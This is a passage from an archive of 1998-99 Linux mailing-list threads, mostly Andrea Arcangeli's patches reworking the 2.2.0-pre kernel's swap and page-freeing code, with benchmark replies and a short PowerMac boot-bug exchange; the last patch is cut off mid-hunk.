P.P.S: BootX vs. OF: I'm normally booting with OF, but to test kernels
I'm using BootX. It's a very nice program...


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 60%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1998-12-31 18:34 64%   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Andrea Arcangeli
  1999-01-01  0:16 64%     ` Steve Bergman
@ 1999-01-01 16:44 51%     ` Andrea Arcangeli
  1999-01-01 20:02 38%       ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-01 16:44 UTC (permalink / raw)
  To: Benjamin Redelings I, Stephen C. Tweedie, Linus Torvalds
  Cc: linux-kernel, Alan Cox, Rik van Riel, linux-mm

I' ll try to comment my latest VM patch.

The patch basically do two things.

It add an heuristic to block trashing tasks in try_to_free_pages() and
allow normal tasks to run fine in the meantime.

It returns to the old do_try_to_free_pages() way to do things. I think the
reason the old way was no longer working well is that we are using
swap_out()  as other freeing-methods while swapout has really nothing to
do with them. 

To get VM stability under low memory we must use both swap_out() (that put
pages from the user process Vmemory to the swap cache) and shrink_mmap() 
in a new method. My new method put user pages in the swap cache because
there we can handle aging very well. Then shrink_mmap() can free a not
refernced page to really do some progress in the memory freeing (and not
only in the swapout).

So basically my patch cause sure the system to swapout more than we was
used to do, but most of the time we will not need a swapin to reput the
pages in the process Vmemory.

Somebody reported a big slowdown of the trashing application. Right now I
don't know which bit of the patch caused this slowdown (yesterday my
benchmark here didn't showed this slowdown). My new trashing_memory
heuristic will probably decrease performance for the trashing application
(but hey you know that if you need performance you can alwaws buy more RAM
;), but it will improve a lot performance for normal not-trashing tasks. 

I' ll try to change do_free_user_and_cache() to see if I can achieve
something better.

I changed also the swap_out() since the best way to choose a process it to
compare the raw RSS I think. And I don' t want that swap_cnt is decreased
of something every time something is swapped out. I want that the kernel
will continue passing throught all the pages of one process once it
started playing with it (if it will still exists of course ;). I changed
also the pressure of swap_out() since it make no sense to me to pass more
than one time over the VM of all tasks in the system. Now at priority 6
swap_out()  is trying to swapout something at max from nr_tasks/7 (low
bound to 1 task). I changed also the pressure of shrink_mmap() because it
was making no sense to me to do two passes on just not referenced pages.

I also changed swapout() allowing it to return 0 1 or more.

0 means that swap_out() is been not able to put in the swap cache
something.

1 means that swap_out() is been able to swapout something and has also
freed up one page (how??? it can't right now because the page should
always be still at least present in the swap cache)

2 means that swap_out() has swapped out 1 page and that the page is still
referenced somewhere (probably by the swap cache)

So in case 2 and case 0 we must use shrink_mmap() to really do some
progress in the page freeing.  This the idea that my new
do_free_user_and_cache() follows.

Comments?

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 51%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-01  0:16 64%     ` Steve Bergman
@ 1999-01-01 17:16 64%       ` Andrea Arcangeli
  0 siblings, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-01 17:16 UTC (permalink / raw)
  To: Steve Bergman; +Cc: linux-mm

On Thu, 31 Dec 1998, Steve Bergman wrote:

> I just tried out the patch and got very disappointing results on my
> 128MB AMD K6-3.  I tested by loading 117 good sized images all at once. 

The point of my patch is to balance the VM and improve performance for not
memory trashing proggy. It make sense that the trashing program is been
slowed down... Once the proggy will stop allocating RAM but it will
continue to use only pages just allocated (eventually in swap) performance
should return normal.

> patch (still running under the patched 2.2.0-pre1) and noted that during
> the compile I had 17MB in the swap with nothing else going on.  Bringing
> up netscape put it up to 25MB.   Suggestions? Requests?  Let me know if

I am going to still change something for sure. But please don't care the
size of the SWAP, care only performances. The pages in the swap right now
are likely to be present also in the swap cache so you' ll handle both
aging and a little cost in a swapin using more the swap cache. Really
there's also the cost of an async swapout to disk but it seems to not harm
here.

> you want me to try anything else.

Yes you should tell me if the performances decreased with normal usage
(like netscape + kernel compile). 

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: BUG: 2.2.0-pre2 on 5500 (and maybe 6500)
  1999-01-01 14:29 60% BUG: 2.2.0-pre2 on 5500 (and maybe 6500) Jens Ch. Restemeier
@ 1999-01-01 19:44 64% ` Tom Rini
  1999-01-02  9:31 64%   ` Jens Ch. Restemeier
  1999-01-02  0:47 64% ` Ian K. Erickson
  1 sibling, 1 reply; 200+ results
From: Tom Rini @ 1999-01-01 19:44 UTC (permalink / raw)
  To: Jens Ch. Restemeier; +Cc: linuxppc-dev


On Fri, 1 Jan 1999, Jens Ch. Restemeier wrote:

> This bugreport applies to a PMac 5500/225, and maybe a 6500, because
> they share a common motherboard.
> I'm booting 2.2.0-pre2 kernel with BootX.

Well, the all-important question is does this show up with a vger kernel?
(2.1.130)

---
Tom Rini (TR1265)
http://dobbstown.yeti.edu/


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-01 16:44 51%     ` Andrea Arcangeli
@ 1999-01-01 20:02 38%       ` Andrea Arcangeli
  1999-01-01 23:46 64%         ` Steve Bergman
  1999-01-02  3:03 38%         ` Andrea Arcangeli
  0 siblings, 2 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-01 20:02 UTC (permalink / raw)
  To: Benjamin Redelings I, Stephen C. Tweedie, Linus Torvalds
  Cc: linux-kernel, Alan Cox, Rik van Riel, linux-mm

I rediffed my VM patch against test1-patch-2.2.0-pre3.gz. I also fixed
some bug (not totally critical but..) pointed out by Linus in my last
code. I also changed the shrink_mmap(0) to shrink_mmap(priority) because
it was completly sucking a lot performance. There is no need to do a
shrink_mmap(0) for example if the cache/buffer are under min. In such case
we must allow the swap_out() to grow the cache before start shrinking it.

So basically this new patch is _far_ more efficient than the last
one (I never seen so good/stable/fast behavior before!).

This my new patch is against testing/test1-patch-2.2.0-pre3.gz that is
against v2.1/2.2.0-pre2 that is against patch-2.2.0-pre1-vs-2.1.132.gz
(where is this last one now?).

Ah, from testing/test1-patch-2.2.0-pre3.gz was missing the trashing memory
initialization that will allow every process to do a fast start.

Index: linux/kernel/fork.c
diff -u linux/kernel/fork.c:1.1.1.3 linux/kernel/fork.c:1.1.1.1.2.6
--- linux/kernel/fork.c:1.1.1.3	Thu Dec  3 12:55:12 1998
+++ linux/kernel/fork.c	Thu Dec 31 17:56:28 1998
@@ -567,6 +570,7 @@
 
 	/* ok, now we should be set up.. */
 	p->swappable = 1;
+	p->trashing_memory = 0;
 	p->exit_signal = clone_flags & CSIGNAL;
 	p->pdeath_signal = 0;
 
Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.8 linux/mm/vmscan.c:1.1.1.1.2.49
--- linux/mm/vmscan.c:1.1.1.8	Fri Jan  1 19:12:54 1999
+++ linux/mm/vmscan.c	Fri Jan  1 20:29:19 1999
@@ -162,8 +162,9 @@
 			 * copy in memory, so we add it to the swap
 			 * cache. */
 			if (PageSwapCache(page_map)) {
+				entry = atomic_read(&page_map->count);
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return entry;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -180,8 +181,9 @@
 		 * asynchronously.  That's no problem, shrink_mmap() can
 		 * correctly clean up the occassional unshared page
 		 * which gets left behind in the swap cache. */
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return 1;	/* we slept: the process may not exist any more */
+		return entry;	/* we slept: the process may not exist any more */
 	}
 
 	/* The page was _not_ dirty, but still has a zero age.  It must
@@ -194,8 +196,9 @@
 		set_pte(page_table, __pte(entry));
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return entry;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,7 +213,7 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
+	entry = atomic_read(&page_map->count);
 	__free_page(page_map);
 	return entry;
 }
@@ -369,8 +372,14 @@
 	 * swapped out.  If the swap-out fails, we clear swap_cnt so the 
 	 * task won't be selected again until all others have been tried.
 	 */
-	counter = ((PAGEOUT_WEIGHT * nr_tasks) >> 10) >> priority;
+	counter = nr_tasks / (priority+1);
+	if (counter < 1)
+		counter = 1;
+	if (counter > nr_tasks)
+		counter = nr_tasks;
+
 	for (; counter >= 0; counter--) {
+		int retval;
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
@@ -382,15 +391,8 @@
 				continue;
 	 		if (p->mm->rss <= 0)
 				continue;
-			if (assign) {
-				/* 
-				 * If we didn't select a task on pass 1, 
-				 * assign each task a new swap_cnt.
-				 * Normalise the number of pages swapped
-				 * by multiplying by (RSS / 1MB)
-				 */
-				p->swap_cnt = AGE_CLUSTER_SIZE(p->mm->rss);
-			}
+			if (assign)
+				p->swap_cnt = p->mm->rss;
 			if (p->swap_cnt > max_cnt) {
 				max_cnt = p->swap_cnt;
 				pbest = p;
@@ -404,14 +406,13 @@
 			}
 			goto out;
 		}
-		pbest->swap_cnt--;
-
 		/*
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
-				return 1;
+		retval = swap_out_process(pbest, gfp_mask);
+		if (retval)
+			return retval;
 	}
 out:
 	return 0;
@@ -438,44 +439,74 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	switch (swap_out(priority, gfp_mask))
+	{
+	default:
+		shrink_mmap(priority, gfp_mask);
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+	case 0:
+		/* swap_out() failed to swapout */
+		if (shrink_mmap(priority, gfp_mask))
+			return 1;
+		return 0;
+	case 1:
+		/* this would be the best but should not happen right now */
+		printk(KERN_DEBUG
+		       "do_free_user_and_cache: swapout returned 1\n");
+		return 1;
+	}
+}
 
-static int kswapd_free_pages(int kswapd_state)
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 6;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	kmem_cache_reap(gfp_mask);
 
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 2;
+		case 2:
+			shrink_dcache_memory(priority, gfp_mask);
+			*state = 0;
+		} while (--priority >= 0);
+	}
+	return 0;
+}
+
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 5;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				kswapd_state++;
-			case 2:
-				free_memory(swap_out(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -523,6 +554,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -542,35 +574,23 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 5;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -593,7 +613,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -631,9 +652,8 @@
 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -642,7 +662,6 @@
 
 void init_swap_timer(void)
 {
-	timer_table[SWAP_TIMER].expires = jiffies;
 	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	enable_swap_tick();
 }
Index: linux/mm/swap_state.c
diff -u linux/mm/swap_state.c:1.1.1.4 linux/mm/swap_state.c:1.1.1.1.2.9
--- linux/mm/swap_state.c:1.1.1.4	Fri Jan  1 19:12:54 1999
+++ linux/mm/swap_state.c	Fri Jan  1 19:25:33 1999
@@ -262,6 +262,9 @@
 struct page * lookup_swap_cache(unsigned long entry)
 {
 	struct page *found;
+#ifdef	SWAP_CACHE_INFO
+	swap_cache_find_total++;
+#endif
 	
 	while (1) {
 		found = find_page(&swapper_inode, entry);
@@ -269,8 +272,12 @@
 			return 0;
 		if (found->inode != &swapper_inode || !PageSwapCache(found))
 			goto out_bad;
-		if (!PageLocked(found))
+		if (!PageLocked(found)) {
+#ifdef	SWAP_CACHE_INFO
+			swap_cache_find_success++;
+#endif
 			return found;
+		}
 		__free_page(found);
 		__wait_on_page(found);
 	}




If this patch is decreasing performance for you (eventually due too much
memory swapped out) you can try this incremental patch (I never tried here
btw):

Index: mm//vmscan.c
===================================================================
RCS file: /var/cvs/linux/mm/vmscan.c,v
retrieving revision 1.1.1.1.2.49
diff -u -r1.1.1.1.2.49 vmscan.c
--- vmscan.c	1999/01/01 19:29:19	1.1.1.1.2.49
+++ linux/mm/vmscan.c	1999/01/01 19:51:22
@@ -441,6 +441,9 @@
 
 static int do_free_user_and_cache(int priority, int gfp_mask)
 {
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
+
 	switch (swap_out(priority, gfp_mask))
 	{
 	default:



I written a swap benchmark that is dirtifying 160Mbyte of VM. For the
first loop 2.2-pre1 was taking 106 sec, for the second loop 120 and
then worse.

test1-pre3 + my new patch in this email, instead takes 120 sec in the
first loop (since it's allocating it's probably slowed down a bit by the
trashing_memory heuristic, and that's right), then it takes 90 sec in the
second loop and 77 sec in the third loop!! and the system was far to be
idle (as when I measured 2.2-pre1), but I was using it without special
regards and was perfectly usable (2.2-pre1 was unusable instead).

Comments?

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 38%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-01 20:02 38%       ` Andrea Arcangeli
@ 1999-01-01 23:46 64%         ` Steve Bergman
  1999-01-02  6:55 46%           ` Linus Torvalds
  1999-01-02  3:03 38%         ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Steve Bergman @ 1999-01-01 23:46 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Benjamin Redelings I, Stephen C. Tweedie, Linus Torvalds,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

Andrea Arcangeli wrote:


> 
> Please stop and try my new patch against Linus's test1-pre3 (that just
> merge some of my new stuff).

I got the patch and I must say I'm impressed.  I ran my "117 image" test
and got these results:

[Note: This loads 117 different images at the same time using 117
separate instances of 'xv' started in the background and results in ~
165 MB of swap area usage.  The machine is an AMD K6-2 300 with 128MB]


2.1.131-ac11                         172 sec  (This was previously the
best)
2.2.0-pre1 + Arcangeli's 1st patch   400 sec
test1-pre  + Arcangeli's 2nd patch   119 sec (!)

Processor utilization was substantially greater with the new patch
compared to either of the others.  Before it starts using swap, memory
is being consumed at ~ 4MB/sec.  After it starts to swap out, it streams
out at ~ 2MB/sec.

The performance is ~ 45% better than ac11 and ~ 70% better than
2.2.0-pre1 in this test.  

I was going to test the low memory case but got side tracked.


Thanks,
Steve
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: BUG: 2.2.0-pre2 on 5500 (and maybe 6500)
  1999-01-01 14:29 60% BUG: 2.2.0-pre2 on 5500 (and maybe 6500) Jens Ch. Restemeier
  1999-01-01 19:44 64% ` Tom Rini
@ 1999-01-02  0:47 64% ` Ian K. Erickson
  1 sibling, 0 replies; 200+ results
From: Ian K. Erickson @ 1999-01-02  0:47 UTC (permalink / raw)
  To: Jens Ch. Restemeier; +Cc: linuxppc-dev


On Fri, 1 Jan 1999, Jens Ch. Restemeier wrote:
> P.S.: Patch ? I'd like to, but I have not much information about the
> hardware. What about starting a project to document all devices in a Mac

I'll second that. There may be legal issue (NDAs?) involved in having
linuxppc share some hardware info, but I hope I am wrong.

Ian K. Erickson                 iPEG, the Internet Productivity Group
Systems Administator            W 422 Riverside, Suite 628
ian@ipeg.com                    Spokane, WA 99204
http://www.ipeg.com             (509)462-iPEG

4F6E65204F5320746F2072756C65207468656D20616C6C2C204F6E65204F5320746
F2066696E64207468656D2CDA4F6E65204F5320746F206272696E67207468656D20
616C6C20616E6420696E20746865206461726B6E6573732062696E64207468656D 


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-01 20:02 38%       ` Andrea Arcangeli
  1999-01-01 23:46 64%         ` Steve Bergman
@ 1999-01-02  3:03 38%         ` Andrea Arcangeli
  1 sibling, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-02  3:03 UTC (permalink / raw)
  To: Benjamin Redelings I, Stephen C. Tweedie, Linus Torvalds,
	Steve Bergman
  Cc: linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Fri, 1 Jan 1999, Andrea Arcangeli wrote:

> I rediffed my VM patch against test1-patch-2.2.0-pre3.gz. I also fixed
> some bug (not totally critical but..) pointed out by Linus in my last
> code. I also changed the shrink_mmap(0) to shrink_mmap(priority) because
> it was completly sucking a lot performance. There is no need to do a
> shrink_mmap(0) for example if the cache/buffer are under min. In such case
> we must allow the swap_out() to grow the cache before start shrinking it.
> 
> So basically this new patch is _far_ more efficient than the last
> one (I never seen so good/stable/fast behavior before!).

Hmm, I just found a big problem, the patch was perfect as far as there was
no I/O bound application running.

When a I/O bound application start to read/write throught the fs, the
buffer and the cache grows, so kswapd has to use do_free_user_and_cache()
to make space for the new data in the cache.

The problem with my last approch is that do_free_user_and_cache() was
always generating I/O to async put some part of user memory to the swap.
This had a _bad_ impact in I/O performance of the I/O bound process :(.

I am the first guy that I hate to see some swapin/swapout while there are
tons of free memory used in cache/buffers.

So I obviously changed something. This new patch fix the problem
fine, even if it doesn't achieve the same iteractive performance as before
under heavily swapping (but it's near), it's a bit more sane ;).
The system is still perfectly balanced thought and now there aren't not
unnecessary swapin/swapout under heavy fs operation while there is a lot of
memory freeable.

Since to be happy I always need to change something more than what needed,
I also moved kmemcachereap with shrink_dcache().

Here is a new patch against test1-pre3. Steve if you are going
to make comparison let me know the results of course! Thanks.

You can also try to increase the priority = 8 in vmscan.c to 9 and see if the
benchmark is improved that way...

Index: linux/kernel/fork.c
diff -u linux/kernel/fork.c:1.1.1.3 linux/kernel/fork.c:1.1.1.1.2.6
--- linux/kernel/fork.c:1.1.1.3	Thu Dec  3 12:55:12 1998
+++ linux/kernel/fork.c	Thu Dec 31 17:56:28 1998
@@ -567,6 +570,7 @@
 
 	/* ok, now we should be set up.. */
 	p->swappable = 1;
+	p->trashing_memory = 0;
 	p->exit_signal = clone_flags & CSIGNAL;
 	p->pdeath_signal = 0;
 
Index: linux/mm/swap_state.c
diff -u linux/mm/swap_state.c:1.1.1.4 linux/mm/swap_state.c:1.1.1.1.2.9
--- linux/mm/swap_state.c:1.1.1.4	Fri Jan  1 19:12:54 1999
+++ linux/mm/swap_state.c	Fri Jan  1 19:25:33 1999
@@ -262,6 +262,9 @@
 struct page * lookup_swap_cache(unsigned long entry)
 {
 	struct page *found;
+#ifdef	SWAP_CACHE_INFO
+	swap_cache_find_total++;
+#endif
 	
 	while (1) {
 		found = find_page(&swapper_inode, entry);
@@ -269,8 +272,12 @@
 			return 0;
 		if (found->inode != &swapper_inode || !PageSwapCache(found))
 			goto out_bad;
-		if (!PageLocked(found))
+		if (!PageLocked(found)) {
+#ifdef	SWAP_CACHE_INFO
+			swap_cache_find_success++;
+#endif
 			return found;
+		}
 		__free_page(found);
 		__wait_on_page(found);
 	}
Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.8 linux/mm/vmscan.c:1.1.1.1.2.51
--- linux/mm/vmscan.c:1.1.1.8	Fri Jan  1 19:12:54 1999
+++ linux/mm/vmscan.c	Sat Jan  2 04:18:31 1999
@@ -10,6 +10,11 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Revisioned the page freeing algorithm: do_free_user_and_cache().
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -162,8 +167,9 @@
 			 * copy in memory, so we add it to the swap
 			 * cache. */
 			if (PageSwapCache(page_map)) {
+				entry = atomic_read(&page_map->count);
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return entry;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -180,8 +186,9 @@
 		 * asynchronously.  That's no problem, shrink_mmap() can
 		 * correctly clean up the occassional unshared page
 		 * which gets left behind in the swap cache. */
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return 1;	/* we slept: the process may not exist any more */
+		return entry;	/* we slept: the process may not exist any more */
 	}
 
 	/* The page was _not_ dirty, but still has a zero age.  It must
@@ -194,8 +201,9 @@
 		set_pte(page_table, __pte(entry));
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return entry;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,7 +218,7 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
+	entry = atomic_read(&page_map->count);
 	__free_page(page_map);
 	return entry;
 }
@@ -369,8 +377,14 @@
 	 * swapped out.  If the swap-out fails, we clear swap_cnt so the 
 	 * task won't be selected again until all others have been tried.
 	 */
-	counter = ((PAGEOUT_WEIGHT * nr_tasks) >> 10) >> priority;
+	counter = nr_tasks / (priority+1);
+	if (counter < 1)
+		counter = 1;
+	if (counter > nr_tasks)
+		counter = nr_tasks;
+
 	for (; counter >= 0; counter--) {
+		int retval;
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
@@ -382,15 +396,8 @@
 				continue;
 	 		if (p->mm->rss <= 0)
 				continue;
-			if (assign) {
-				/* 
-				 * If we didn't select a task on pass 1, 
-				 * assign each task a new swap_cnt.
-				 * Normalise the number of pages swapped
-				 * by multiplying by (RSS / 1MB)
-				 */
-				p->swap_cnt = AGE_CLUSTER_SIZE(p->mm->rss);
-			}
+			if (assign)
+				p->swap_cnt = p->mm->rss;
 			if (p->swap_cnt > max_cnt) {
 				max_cnt = p->swap_cnt;
 				pbest = p;
@@ -404,14 +411,13 @@
 			}
 			goto out;
 		}
-		pbest->swap_cnt--;
-
 		/*
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
-				return 1;
+		retval = swap_out_process(pbest, gfp_mask);
+		if (retval)
+			return retval;
 	}
 out:
 	return 0;
@@ -438,44 +444,64 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	if (swap_out(priority, gfp_mask))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 2;
+		case 2:
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+			*state = 0;
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 5;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				kswapd_state++;
-			case 2:
-				free_memory(swap_out(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -523,6 +549,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -542,35 +569,23 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 5;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -593,7 +608,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -631,9 +647,8 @@
